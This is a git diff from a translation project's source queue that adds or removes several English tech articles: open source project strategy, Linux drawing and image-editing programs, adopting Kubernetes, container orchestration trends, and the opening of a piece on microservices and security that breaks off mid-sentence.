+![](https://www.linuxfoundation.org/wp-content/uploads/2017/11/open-source-strategy-1024x576.jpg) + +This article explains how to walk through, measure, and define strategies collaboratively in an open source community. + + _“If you don’t know where you are going, you’ll end up someplace else.” _ _—_  Yogi Berra + +Open source projects are generally started as a way to scratch one’s itch — and frankly that’s one of its greatest attributes. Getting code down provides a tangible method to express an idea, showcase a need, and solve a problem. It avoids over thinking and getting a project stuck in analysis-paralysis, letting the project pragmatically solve the problem at hand. + +Next, a project starts to scale up and gets many varied users and contributions, with plenty of opinions along the way. That leads to the next big challenge — how does a project start to build a strategic vision? In this article, I’ll describe how to walk through, measure, and define strategies collaboratively, in a community. + +Strategy may seem like a buzzword of the corporate world rather something that an open source community would embrace, so I suggest stripping away the negative actions that are sometimes associated with this word (e.g., staff reductions, discontinuations, office closures). Strategy done right isn’t a tool to justify unfortunate actions but to help show focus and where each community member can contribute. + +A good application of strategy achieves the following: + +* Why the project exists? + +* What the project looks to achieve? + +* What is the ideal end state for a project is. + +The key to success is answering these questions as simply as possible, with consensus from your community. Let’s look at some ways to do this. + +### Setting a mission and vision + + _“_ _Efforts and courage are not enough without purpose and direction.”_  — John F. Kennedy + +All strategic planning starts off with setting a course for where the project wants to go. The two tools used here are  _Mission_  and  _Vision_ . They are complementary terms, describing both the reason a project exists (mission) and the ideal end state for a project (vision). + +A great way to start this exercise with the intent of driving consensus is by asking each key community member the following questions: + +* What drove you to join and/or contribute the project? + +* How do you define success for your participation? + +In a company, you’d ask your customers these questions usually. But in open source projects, the customers are the project participants — and their time investment is what makes the project a success. + +Driving consensus means capturing the answers to these questions and looking for themes across them. At R Consortium, for example, I created a shared doc for the board to review each member’s answers to the above questions, and followed up with a meeting to review for specific themes that came from those insights. + +Building a mission flows really well from this exercise. The key thing is to keep the wording of your mission short and concise. Open Mainframe Project has done this really well. Here’s their mission: + + _Build community and adoption of Open Source on the mainframe by:_ + +* _Eliminating barriers to Open Source adoption on the mainframe_ + +* _Demonstrating value of the mainframe on technical and business levels_ + +* _Strengthening collaboration points and resources for the community to thrive_ + +At 40 words, it passes the key eye tests of a good mission statement; it’s clear, concise, and demonstrates the useful value the project aims for. + +The next stage is to reflect on the mission statement and ask yourself this question: What is the ideal outcome if the project accomplishes its mission? That can be a tough one to tackle. Open Mainframe Project put together its vision really well: + + _Linux on the Mainframe as the standard for enterprise class systems and applications._ + +You could read that as a [BHAG][1], but it’s really more of a vision, because it describes a future state that is what would be created by the mission being fully accomplished. It also hits the key pieces to an effective vision — it’s only 13 words, inspirational, clear, memorable, and concise. + +Mission and vision add clarity on the who, what, why, and how for your project. But, how do you set a course for getting there? + +### Goals, Objectives, Actions, and Results + + _“I don’t focus on what I’m up against. I focus on my goals and I try to ignore the rest.”_  — Venus Williams + +Looking at a mission and vision can get overwhelming, so breaking them down into smaller chunks can help the project determine how to get started. This also helps prioritize actions, either by importance or by opportunity. Most importantly, this step gives you guidance on what things to focus on for a period of time, and which to put off. + +There are lots of methods of time bound planning, but the method I think works the best for projects is what I’ve dubbed the GOAR method. It’s an acronym that stands for: + +* Goals define what the project is striving for and likely would align and support the mission. Examples might be “Grow a diverse contributor base” or “Become the leading project for X.” Goals are aspirational and set direction. + +* Objectives show how you measure a goal’s completion, and should be clear and measurable. You might also have multiple objectives to measure the completion of a goal. For example, the goal “Grow a diverse contributor base” might have objectives such as “Have X total contributors monthly” and “Have contributors representing Y different organizations.” + +* Actions are what the project plans to do to complete an objective. This is where you get tactical on exactly what needs done. For example, the objective “Have contributors representing Y different organizations” would like have actions of reaching out to interested organizations using the project, having existing contributors mentor new mentors, and providing incentives for first time contributors. + +* Results come along the way, showing progress both positive and negative from the actions. + +You can put these into a table like this: + +| Goals | Objectives | Actions | Results | +|:--|:--|:--|:--| +| Grow a diverse contributor base     | Have X total contributors monthly | Existing contributors mentor new mentors Providing incentives for first time contributors | | +| | Have contributors representing Y different organizations | Reach out to interested organizations using the project | | + + +In large organizations, monthly or quarterly goals and objectives often make sense; however, on open source projects, these time frames are unrealistic. Six- even 12-month tracking allows the project leadership to focus on driving efforts at a high level by nurturing the community along. + +The end result is a rubric that provides clear vision on where the project is going. It also lets community members more easily find ways to contribute. For example, your project may include someone who knows a few organizations using the project — this person could help introduce those developers to the codebase and guide them through their first commit. + +### What happens if the project doesn’t hit the goals? + + _“I have not failed. I’ve just found 10,000 ways that won’t work.”_  — Thomas A. Edison + +Figuring out what is within the capability of an organization — whether Fortune 500 or a small open source project — is hard. And, sometimes the expectations or market conditions change along the way. Does that make the strategy planning process a failure? Absolutely not! + +Instead, you can use this experience as a way to better understand your project’s velocity, its impact, and its community, and perhaps as a way to prioritize what is important and what’s not. + +-------------------------------------------------------------------------------- + +via: https://www.linuxfoundation.org/blog/set-open-source-strategy/ + +作者:[ John Mertic][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxfoundation.org/author/jmertic/ +[1]:https://en.wikipedia.org/wiki/Big_Hairy_Audacious_Goal +[2]:https://www.linuxfoundation.org/author/jmertic/ +[3]:https://www.linuxfoundation.org/category/blog/ +[4]:https://www.linuxfoundation.org/category/audience/c-level/ +[5]:https://www.linuxfoundation.org/category/audience/developer-influencers/ +[6]:https://www.linuxfoundation.org/category/audience/entrepreneurs/ +[7]:https://www.linuxfoundation.org/category/campaigns/membership/how-to/ +[8]:https://www.linuxfoundation.org/category/campaigns/events-campaigns/linux-foundation/ +[9]:https://www.linuxfoundation.org/category/audience/open-source-developers/ +[10]:https://www.linuxfoundation.org/category/audience/open-source-professionals/ +[11]:https://www.linuxfoundation.org/category/audience/open-source-users/ +[12]:https://www.linuxfoundation.org/category/blog/thought-leadership/ diff --git a/sources/tech/20171116 Unleash Your Creativity – Linux Programs for Drawing and Image Editing.md b/sources/tech/20171116 Unleash Your Creativity – Linux Programs for Drawing and Image Editing.md new file mode 100644 index 0000000000..c6c50d9b25 --- /dev/null +++ b/sources/tech/20171116 Unleash Your Creativity – Linux Programs for Drawing and Image Editing.md @@ -0,0 +1,130 @@ +### Unleash Your Creativity – Linux Programs for Drawing and Image Editing + + By: [chabowski][1] + +The following article is part of a series of articles that provide tips and tricks for Linux newbies – or Desktop users that are not yet experienced with regard to certain topics. This series intends to complement the special edition #30 “[Getting Started with Linux][2]” based on [openSUSE Leap][3], recently published by the [Linux Magazine,][4] with valuable additional information. + +![](https://www.suse.com/communities/blog/files/2017/11/DougDeMaio-450x450.jpeg) + +This article has been contributed by Douglas DeMaio, openSUSE PR Expert at SUSE. + +Both Mac OS or Window offer several popular programs for graphics editing, vector drawing and creating and manipulating Portable Document Format (PDF). The good news: users familiar with the Adobe Suite can transition with ease to free, open-source programs available on Linux. + +Programs like [GIMP][5], [InkScape][6] and [Okular][7] are cross platform programs that are available by default in Linux/GNU distributions and are persuasive alternatives to expensive Adobe programs like [Photoshop][8], [Illustrator][9] and [Acrobat][10]. + +These creativity programs on Linux distributions are just as powerful as those for macOS or Window. This article will explain some of the differences and how the programs can be used to make your transition to Linux comfortable. + +### Krita + +The KDE desktop environment comes with tons of cool applications. [Krita][11] is a professional open source painting program. It gives users the freedom to create any artistic image they desire. Krita features tools that are much more extensive than the tool sets of most proprietary programs you might be familiar with. From creating textures to comics, Krita is a must have application for Linux users. + +![](https://www.suse.com/communities/blog/files/2017/11/krita-450x267.png) + +### GIMP + +GNU Image Manipulation Program (GIMP) is a cross-platform image editor. Users of Photoshop will find the User Interface of GIMP to be similar to that of Photoshop. The drop down menu offers colors, layers, filters and tools to help the user with editing graphics. Rulers are located both horizontal and vertical and guide can be dragged across the screen to give exact measurements. The drop down menu gives tool options for resizing or cropping photos; adjustments can be made to the color balance, color levels, brightness and contrast as well as hue and saturation. + +![](https://www.suse.com/communities/blog/files/2017/11/gimp-450x281.png) + +There are multiple filters in GIMP to enhance or distort your images. Filters for artistic expression and animation are available and are more powerful tool options than those found in some proprietary applications. Gradients can be applied through additional layers and the Text Tool offers many fonts, which can be altered in shape and size through the Perspective Tool. + +The cloning tool works exactly like those in other graphics editors, so manipulating images is simple and acurrate given the selection of brush sizes to do the job. + +Perhaps one of the best options available with GIMP is that the images can be saved in a variety of formats like .jpg, .png, .pdf, .eps and .svg. These image options provide high-quality images in a small file. + +### InkScape + +Designing vector imagery with InkScape is simple and free. This cross platform allows for the creation of logos and illustrations that are highly scalable. Whether designing cartoons or creating images for branding, InkScape is a powerful application to get the job done. Like GIMP, InkScape lets you save files in various formats and allows for object manipulation like moving, rotating and skewing text and objects. Shape tools are available with InkScape so making stars, hexagons and other elements will meet the needs of your creative mind. + +![](https://www.suse.com/communities/blog/files/2017/11/inkscape-450x273.png) + +InkScape offers a comprehensive tool set, including a drawing tool, a pen tool and the freehand calligraphy tool that allows for object creation with your own personal style. The color selector gives you the choice of RGB, CMYK and RGBA – using specific colors for branding logos, icons and advertisement is definitely convincing. + +Short cut commands are similar to what users experience in Adobe Illustrator. Making layers and grouping or ungrouping the design elements can turn a blank page into a full-fledged image that can be used for designing technical diagrams for presentations, importing images into a multimedia program or for creating web graphics and software design. + +Inkscape can import vector graphics from multiple other programs. It can even import bitmap images. Inkscape is one of those cross platform, open-source programs that allow users to operate across different operating systems, no matter if they work with macOS, Windows or Linux. + +### Okular and LibreOffice + +LibreOffice, which is a free, open-source Office Suite, allows users to collaborate and interact with documents and important files on Linux, but also on macOS and Window. You can also create PDF files via LibreOffice, and LibreOffice Draw lets you view (and edit) PDF files as images. + +![](https://www.suse.com/communities/blog/files/2017/11/draw-450x273.png) + +However, the Portable Document Format (PDF) is quite different on the three Operating Systems. MacOS offers [Preview][12] by default; Windows has [Edge][13]. Of course, also Adobe Reader can be used for both MacOS and Window. With Linux, and especially the desktop selection of KDE, [Okular][14] is the default program for viewing PDF files. + +![](https://www.suse.com/communities/blog/files/2017/11/okular-450x273.png) + +The functionality of Okular supports different types of documents, like PDF, Postscript, [DjVu][15], [CHM][16], [XPS][17], [ePub][18] and others. Yet the universal document viewer also offers some powerful features that make interacting with a document different from other programs on MacOS and Windows. Okular gives selection and search tools that make accessing the text in PDFs fluid for how users interact with documents. Viewing documents with Okular is also accommodating with the magnification tool that allows for a quick look at small text in a document. + +Okular also provides users with the option to configure it to use more memory if the document is too large and freezes the Operating System. This functionality is convenient for users accessing high-quality print documents for example for advertising. + +For those who want to change locked images and documents, it’s rather easy to do so with LibreOffice Draw. A hypothetical situation would be to take a locked IRS (or tax) form and change it to make the uneditable document editable. Imagine how much fun it could be to transform it to some humorous kind of tax form … + +And indeed, the sky’s the limit on how creative a user wants to be when using programs that are available on Linux distributions. + +![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) + +![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) + +![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) + +![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) + +![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) + +( + + _**2** votes, average: **5.00** out of 5_ + +) + + _You need to be a registered member to rate this post._ + +Tags: [drawing][19], [Getting Started with Linux][20], [GIMP][21], [image editing][22], [Images][23], [InkScape][24], [KDE][25], [Krita][26], [Leap 42.3][27], [LibreOffice][28], [Linux Magazine][29], [Okular][30], [openSUSE][31], [PDF][32] Categories: [Desktop][33], [Expert Views][34], [LibreOffice][35], [openSUSE][36] + +-------------------------------------------------------------------------------- + +via: https://www.suse.com/communities/blog/unleash-creativity-linux-programs-drawing-image-editing/ + +作者:[chabowski ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.suse.com/communities/blog/author/chabowski/ +[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux +[3]:https://en.opensuse.org/Portal:42.3 +[4]:http://www.linux-magazine.com/ +[5]:https://www.gimp.org/ +[6]:https://inkscape.org/en/ +[7]:https://okular.kde.org/ +[8]:http://www.adobe.com/products/photoshop.html +[9]:http://www.adobe.com/products/illustrator.html +[10]:https://acrobat.adobe.com/us/en/acrobat/acrobat-pro-cc.html +[11]:https://krita.org/en/ +[12]:https://en.wikipedia.org/wiki/Preview_(macOS) +[13]:https://en.wikipedia.org/wiki/Microsoft_Edge +[14]:https://okular.kde.org/ +[15]:http://djvu.org/ +[16]:https://fileinfo.com/extension/chm +[17]:https://fileinfo.com/extension/xps +[18]:http://idpf.org/epub +[19]:https://www.suse.com/communities/blog/tag/drawing/ +[20]:https://www.suse.com/communities/blog/tag/getting-started-with-linux/ +[21]:https://www.suse.com/communities/blog/tag/gimp/ +[22]:https://www.suse.com/communities/blog/tag/image-editing/ +[23]:https://www.suse.com/communities/blog/tag/images/ +[24]:https://www.suse.com/communities/blog/tag/inkscape/ +[25]:https://www.suse.com/communities/blog/tag/kde/ +[26]:https://www.suse.com/communities/blog/tag/krita/ +[27]:https://www.suse.com/communities/blog/tag/leap-42-3/ +[28]:https://www.suse.com/communities/blog/tag/libreoffice/ +[29]:https://www.suse.com/communities/blog/tag/linux-magazine/ +[30]:https://www.suse.com/communities/blog/tag/okular/ +[31]:https://www.suse.com/communities/blog/tag/opensuse/ +[32]:https://www.suse.com/communities/blog/tag/pdf/ +[33]:https://www.suse.com/communities/blog/category/desktop/ +[34]:https://www.suse.com/communities/blog/category/expert-views/ +[35]:https://www.suse.com/communities/blog/category/libreoffice/ +[36]:https://www.suse.com/communities/blog/category/opensuse/ diff --git a/sources/tech/20171120 Adopting Kubernetes step by step.md b/sources/tech/20171120 Adopting Kubernetes step by step.md new file mode 100644 index 0000000000..05faf304c8 --- /dev/null +++ b/sources/tech/20171120 Adopting Kubernetes step by step.md @@ -0,0 +1,93 @@ +Adopting Kubernetes step by step +============================================================ + +Why Docker and Kubernetes? + +Containers allow us to build, ship and run distributed applications. They remove the machine constraints from applications and lets us create a complex application in a deterministic fashion. + +Composing applications with containers allows us to make development, QA and production environments closer to each other (if you put the effort in to get there). By doing so, changes can be shipped faster and testing a full system can happen sooner. + +[Docker][1] — the containerization platform — provides this, making software  _independent_  of cloud providers. + +However, even with containers the amount of work needed for shipping your application through any cloud provider (or in a private cloud) is significant. An application usually needs auto scaling groups, persistent remote discs, auto discovery, etc. But each cloud provider has different mechanisms for doing this. If you want to support these features, you very quickly become cloud provider dependent. + +This is where [Kubernetes][2] comes in to play. It is an orchestration system for containers that allows you to manage, scale and deploy different pieces of your application — in a standardised way — with great tooling as part of it. It’s a portable abstraction that’s compatible with the main cloud providers (Google Cloud, Amazon Web Services and Microsoft Azure all have support for Kubernetes). + +A way to visualise your application, containers and Kubernetes is to think about your application as a shark — stay with me — that exists in the ocean (in this example, the ocean is your machine). The ocean may have other precious things you don’t want your shark to interact with, like [clown fish][3]. So you move you shark (your application) into a sealed aquarium (Container). This is great but not very robust. Your aquarium can break or maybe you want to build a tunnel to another aquarium where other fish live. Or maybe you want many copies of that aquarium in case one needs cleaning or maintenance… this is where Kubernetes clusters come to play. + + +![](https://cdn-images-1.medium.com/max/1600/1*OVt8cnY1WWOqdLFycCgdFg.jpeg) +Evolution to Kubernetes + +With Kubernetes being supported by the main cloud providers, it makes it easier for you and your team to have environments from  _development _ to  _production _ that are almost identical to each other. This is because Kubernetes has no reliance on proprietary software, services or infrastructure. + +The fact that you can start your application in your machine with the same pieces as in production closes the gaps between a development and a production environment. This makes developers more aware of how an application is structured together even though they might only be responsible for one piece of it. It also makes it easier for your application to be fully tested earlier in the pipeline. + +How do you work with Kubernetes? + +With more people adopting Kubernetes new questions arise; how should I develop against a cluster based environment? Suppose you have 3 environments — development, QA and production — how do I fit Kubernetes in them? Differences across these environments will still exist, either in terms of development cycle (e.g. time spent to see my code changes in the application I’m running) or in terms of data (e.g. I probably shouldn’t test with production data in my QA environment as it has sensitive information). + +So, should I always try to work inside a Kubernetes cluster, building images, recreating deployments and services while I code? Or maybe I should not try too hard to make my development environment be a Kubernetes cluster (or set of clusters) in development? Or maybe I should work in a hybrid way? + + +![](https://cdn-images-1.medium.com/max/1600/1*MXokxD8Ktte4_vWvTas9uw.jpeg) +Development with a local cluster + +If we carry on with our metaphor, the holes on the side represent a way to make changes to our app while keeping it in a development cluster. This is usually achieved via [volumes][4]. + +A Kubernetes series + +The Kubernetes series repository is open source and available here: + +### [https://github.com/red-gate/ks][5] + +We’ve written this series as we experiment with different ways to build software. We’ve tried to constrain ourselves to use Kubernetes in all environments so that we can explore the impact these technologies will have on the development and management of data and the database. + +The series starts with the basic creation of a React application hooked up to Kubernetes, and evolves to encompass more of our development requirements. By the end we’ll have covered all of our application development needs  _and_  have understood how best to cater for the database lifecycle in this world of containers and clusters. + +Here are the first 5 episodes of this series: + +1. ks1: build a React app with Kubernetes + +2. ks2: make minikube detect React code changes + +3. ks3: add a python web server that hosts an API + +4. ks4: make minikube detect Python code changes + +5. ks5: create a test environment + +The second part of the series will add a database and try to work out the best way to evolve our application alongside it. + +By running Kubernetes in all environments, we’ve been forced to solve new problems as we try to keep the development cycle as fast as possible. The trade-off being that we are constantly exposed to Kubernetes and become more accustomed to it. By doing so, development teams become responsible for production environments, which is no longer difficult as all environments (development through production) are all managed in the same way. + +What’s next? + +We will continue this series by incorporating a database and experimenting to find the best way to have a seamless database lifecycle experience with Kubernetes. + + _This Kubernetes series is brought to you by Foundry, Redgate’s R&D division. We’re working on making it easier to manage data alongside containerised environments, so if you’re working with data and containerised environments, we’d like to hear from you — reach out directly to the development team at _ [_foundry@red-gate.com_][6] + +* * * + + _We’re hiring_ _. Are you interested in uncovering product opportunities, building _ [_future technology_][7] _ and taking a startup-like approach (without the risk)? Take a look at our _ [_Software Engineer — Future Technologies_][8] _ role and read more about what it’s like to work at Redgate in _ [_Cambridge, UK_][9] _._ + +-------------------------------------------------------------------------------- + +via: https://medium.com/ingeniouslysimple/adopting-kubernetes-step-by-step-f93093c13dfe + +作者:[santiago arias][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://medium.com/@santiaago?source=post_header_lockup +[1]:https://www.docker.com/what-docker +[2]:https://kubernetes.io/ +[3]:https://www.google.co.uk/search?biw=723&bih=753&tbm=isch&sa=1&ei=p-YCWpbtN8atkwWc8ZyQAQ&q=nemo+fish&oq=nemo+fish&gs_l=psy-ab.3..0i67k1l2j0l2j0i67k1j0l5.5128.9271.0.9566.9.9.0.0.0.0.81.532.9.9.0....0...1.1.64.psy-ab..0.9.526...0i7i30k1j0i7i10i30k1j0i13k1j0i10k1.0.FbAf9xXxTEM +[4]:https://kubernetes.io/docs/concepts/storage/volumes/ +[5]:https://github.com/red-gate/ks +[6]:mailto:foundry@red-gate.com +[7]:https://www.red-gate.com/foundry/ +[8]:https://www.red-gate.com/our-company/careers/current-opportunities/software-engineer-future-technologies +[9]:https://www.red-gate.com/our-company/careers/living-in-cambridge diff --git a/sources/tech/20171120 Containers and Kubernetes Whats next.md b/sources/tech/20171120 Containers and Kubernetes Whats next.md deleted file mode 100644 index b73ccb21c2..0000000000 --- a/sources/tech/20171120 Containers and Kubernetes Whats next.md +++ /dev/null @@ -1,98 +0,0 @@ -YunfengHe Translating -Containers and Kubernetes: What's next? -============================================================ - -### What's ahead for container orchestration and Kubernetes? Here's an expert peek - -![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") - -If you want a basic idea of where containers are headed in the near future, follow the money. There’s a lot of it: 451 Research projects that the overall market for containers will hit roughly [$2.7 billion in 2020][4], a 3.5-fold increase from the $762 million spent on container-related technology in 2016. - -There’s an obvious fundamental factor behind such big numbers: Rapidly increasing containerization. The parallel trend: As container adoption grows, so will container  _orchestration_  adoption. - -As recent survey data from  [_The New Stack_][5]  indicates, container adoption is the most significant catalyst of orchestration adoption: 60 percent of respondents who’ve deployed containers broadly in production report they’re also using Kubernetes widely in production. Another 19 percent of respondents with broad container deployments in production were in the initial stages of broad Kubernetes adoption. Meanwhile, just 5 percent of those in the initial phases of deploying containers in production environments were using Kubernetes broadly – but 58 percent said they were preparing to do so. It’s a chicken-and-egg relationship. - - -Most experts agree that an orchestration tool is essential to the scalable [long-term management of containers][6] – and corresponding developments in the marketplace. “The next trends in container orchestration are all focused on broadening adoption,” says Alex Robinson, software engineer at [Cockroach Labs][7]. - -This is a quickly shifting landscape, one that is just starting to realize its future potential. So we checked in with Robinson and other practitioners to get their boots-on-the-ground perspective on what’s next in container orchestration – and for Kubernetes itself. - -### **Container orchestration shifts to mainstream** - -We’re at the precipice common to most major technology shifts, where we transition from the careful steps of early adoption to cliff-diving into commonplace use. That will create new demand for the plain-vanilla requirements that make mainstream adoption easier, especially in large enterprises. - -“The gold rush phase of early innovation has slowed down and given way to a much stronger focus on stability and usability,” Robinson says. “This means we'll see fewer major announcements of new orchestration systems, and more security options, management tools, and features that make it easier to take advantage of the flexibility already inherent in the major orchestration systems.” - -### **Reduced complexity** - -On a related front, expect an intensifying effort to cut back on the complexity that some organizations face when taking their first plunge into container orchestration. As we’ve covered before, deploying a container might be “easy,” but [managing containers long-term ][8]requires more care. - -“Today, container orchestration is too complex for many users to take full advantage,” says My Karlsson, developer at [Codemill AB][9]. “New users are often struggling just to get single or small-size container configurations running in isolation, especially when applications are not originally designed for it. There are plenty of opportunities to simplify the orchestration of non-trivial applications and make the technology more accessible.” - -### **Increasing focus on hybrid cloud and multi-cloud** - -As adoption of containers and container orchestration grows, more organizations will scale from a starting point of, say, running non-critical workloads in a single environment to more [complex use cases][10] across multiple environments. For many companies, that will mean managing containerized applications (and particularly containerized microservices) across [hybrid cloud][11] and [multi-cloud][12] environments, often globally. - -"Containers and Kubernetes have made hybrid cloud and application portability a reality,” says [Brian Gracely][13], director of [Red Hat][14] OpenShift product strategy. “Combined with the Open Service Broker, we expect to see an explosion of new applications that combine private and public cloud resources." - -“I believe that federation will get a push, enabling much-wanted features such as seamless multi-region and multi-cloud deployments,” says Carlos Sanchez, senior software engineer at [CloudBees][15].  - -**[ Want CIO wisdom on hybrid cloud and multi-cloud strategy? See our related resource, **[**Hybrid Cloud: The IT leader's guide**][16]**. ]** - -### **Continued consolidation of platforms and tools** - -Technology consolidation is common trend; container orchestration is no exception. - -“As containerization goes mainstream, engineers are consolidating on a very small number of technologies to run their [microservices and] containers and Kubernetes will become the dominant container orchestration platform, far outstripping other platforms,” says Ben Newton, analytics lead at [Sumo Logic][17]. “Companies will adopt Kubernetes to drive a cloud-neutral approach as Kubernetes provides a reasonably clear path to reduce dependence on [specific] cloud ecosystems.**”** - -### **Speaking of Kubernetes, what’s next?** - -"Kubernetes is here for the long haul, and the community driving it is doing great job – but there's lots ahead,” says Gadi Naor, CTO and co-founder of [Alcide][18]. Our experts shared several predictions specific to [the increasingly popular Kubernetes platform][19]:  - - **_Gadi Naor at Alcide:_**  “Operators will continue to evolve and mature, to a point where applications running on Kubernetes will become fully self-managed. Deploying and monitoring microservices on top of Kubernetes with [OpenTracing][20] and service mesh frameworks such as [istio][21] will help shape new possibilities.” - - **_Brian Gracely at Red Hat:_**  “Kubernetes continues to expand in terms of the types of applications it can support. When you can run traditional applications, cloud-native applications, big data applications, and HPC or GPU-centric applications on the same platform, it unlocks a ton of architectural flexibility.” - - **_Ben Newton at Sumo Logic: _ “**As Kubernetes becomes more dominant, I would expect to see more normalization of the operational mechanisms – particularly integrations into third-party management and monitoring platforms.” - - **_Carlos Sanchez at CloudBees: _** “In the immediate future there is the ability to run without Docker, using other runtimes...to remove any lock-in. [Editor’s note: [CRI-O][22], for example, offers this ability.] “Also, [look for] storage improvements to support enterprise features like data snapshotting and online volume resizing.” - - - **_Alex Robinson at Cockroach Labs: _ “**One of the bigger developments happening in the Kubernetes community right now is the increased focus on managing [stateful applications][23]. Managing state in Kubernetes right now is very difficult if you aren't running in a cloud that offers remote persistent disks, but there's work being done on multiple fronts [both inside Kubernetes and by external vendors] to improve this.” - --------------------------------------------------------------------------------- - -via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next - -作者:[Kevin Casey ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://enterprisersproject.com/user/kevin-casey -[1]:https://enterprisersproject.com/article/2017/11/kubernetes-numbers-10-compelling-stats -[2]:https://enterprisersproject.com/article/2017/11/how-enterprise-it-uses-kubernetes-tame-container-complexity -[3]:https://enterprisersproject.com/article/2017/11/5-kubernetes-success-tips-start-smart?sc_cid=70160000000h0aXAAQ -[4]:https://451research.com/images/Marketing/press_releases/Application-container-market-will-reach-2-7bn-in-2020_final_graphic.pdf -[5]:https://thenewstack.io/ -[6]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul -[7]:https://www.cockroachlabs.com/ -[8]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul -[9]:https://codemill.se/ -[10]:https://www.redhat.com/en/challenges/integration?intcmp=701f2000000tjyaAAA -[11]:https://enterprisersproject.com/hybrid-cloud -[12]:https://enterprisersproject.com/article/2017/7/multi-cloud-vs-hybrid-cloud-whats-difference -[13]:https://enterprisersproject.com/user/brian-gracely -[14]:https://www.redhat.com/en -[15]:https://www.cloudbees.com/ -[16]:https://enterprisersproject.com/hybrid-cloud?sc_cid=70160000000h0aXAAQ -[17]:https://www.sumologic.com/ -[18]:http://alcide.io/ -[19]:https://enterprisersproject.com/article/2017/10/how-explain-kubernetes-plain-english -[20]:http://opentracing.io/ -[21]:https://istio.io/ -[22]:http://cri-o.io/ -[23]:https://opensource.com/article/17/2/stateful-applications -[24]:https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next?rate=PBQHhF4zPRHcq2KybE1bQgMkS2bzmNzcW2RXSVItmw8 -[25]:https://enterprisersproject.com/user/kevin-casey diff --git a/sources/tech/20171123 Why microservices are a security issue.md b/sources/tech/20171123 Why microservices are a security issue.md new file mode 100644 index 0000000000..d5868faa9e --- /dev/null +++ b/sources/tech/20171123 Why microservices are a security issue.md @@ -0,0 +1,116 @@ +Why microservices are a security issue +============================================================ + +### Maybe you don't want to decompose all your legacy applications into microservices, but you might consider starting with your security functions. + +![Why microservices are a security issue](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003601_05_mech_osyearbook2016_security_cc.png?itok=3V07Lpko "Why microservices are a security issue") +Image by : Opensource.com + +I struggled with writing the title for this post, and I worry that it comes across as clickbait. If you've come to read this because it looked like clickbait, then sorry.[1][5]I hope you'll stay anyway: there are lots of fascinating[2][6] points and many[3][7]footnotes. What I  _didn't_  mean to suggest is that microservices cause [security][15]problems—though like any component, of course, they can—but that microservices are appropriate objects of interest to those involved with security. I'd go further than that: I think they are an excellent architectural construct for those concerned with security. + +And why is that? Well, for those of us with a [systems security][16] bent, the world is an interesting place at the moment. We're seeing a growth in distributed systems, as bandwidth is cheap and latency low. Add to this the ease of deploying to the cloud, and more architects are beginning to realise that they can break up applications, not just into multiple layers, but also into multiple components within the layer. Load balancers, of course, help with this when the various components in a layer are performing the same job, but the ability to expose different services as small components has led to a growth in the design, implementation, and deployment of  _microservices_ . + +More on Microservices + +* [How to explain microservices to your CEO][1] + +* [Free eBook: Microservices vs. service-oriented architecture][2] + +* [Secured DevOps for microservices][3] + +So, [what exactly is a microservice][23]? I quite like [Wikipedia's definition][24], though it's interesting that security isn't mentioned there.[4][17] One of the points that I like about microservices is that, when well-designed, they conform to the first two points of Peter H. Salus' description of the [Unix philosophy][25]: + +1. Write programs that do one thing and do it well. + +2. Write programs to work together. + +3. Write programs to handle text streams, because that is a universal interface. + +The last of the three is slightly less relevant, because the Unix philosophy is generally used to refer to standalone applications, which often have a command instantiation. It does, however, encapsulate one of the basic requirements of microservices: that they must have well-defined interfaces. + +By "well-defined," I don't just mean a description of any externally accessible APIs' methods, but also of the normal operation of the microservice: inputs and outputs—and, if there are any, side-effects. As I described in a previous post, "[5 traits of good systems architecture][18]," data and entity descriptions are crucial if you're going to be able to design a system. Here, in our description of microservices, we get to see why these are so important, because, for me, the key defining feature of a microservices architecture is decomposability. And if you're going to decompose[5][8] your architecture, you need to be very, very clear which "bits" (components) are going to do what. + +And here's where security starts to come in. A clear description of what a particular component should be doing allows you to: + +* Check your design + +* Ensure that your implementation meets the description + +* Come up with reusable unit tests to check functionality + +* Track mistakes in implementation and correct them + +* Test for unexpected outcomes + +* Monitor for misbehaviour + +* Audit actual behaviour for future scrutiny + +Now, are all these things possible in a larger architecture? Yes, they are. But they become increasingly difficult where entities are chained together or combined in more complex configurations. Ensuring  _correct_  implementation and behaviour is much, much easier when you've got smaller pieces to work together. And deriving complex systems behaviours—and misbehaviours—is much more difficult if you can't be sure that the individual components are doing what they ought to be. + +It doesn't stop here, however. As I've mentioned on many [previous occasions][19], writing good security code is difficult.[7][9] Proving that it does what it should do is even more difficult. There is every reason, therefore, to restrict code that has particular security 